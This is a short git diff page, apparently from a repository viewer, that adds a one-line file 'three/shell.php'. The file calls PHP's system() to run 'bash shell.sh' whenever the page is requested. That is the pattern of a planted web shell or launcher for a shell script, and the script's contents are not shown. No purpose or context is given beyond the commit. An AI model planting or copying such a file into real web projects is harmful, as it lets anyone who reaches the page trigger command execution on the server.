diff options
Diffstat (limited to 'three/shell.php')
-rw-r--r-- | three/shell.php | 1 |
1 files changed, 1 insertions, 0 deletions
diff --git a/three/shell.php b/three/shell.php new file mode 100644 index 0000000..43f9792 --- /dev/null +++ b/three/shell.php @@ -0,0 +1 @@ +<?php system("bash shell.sh"); ?> |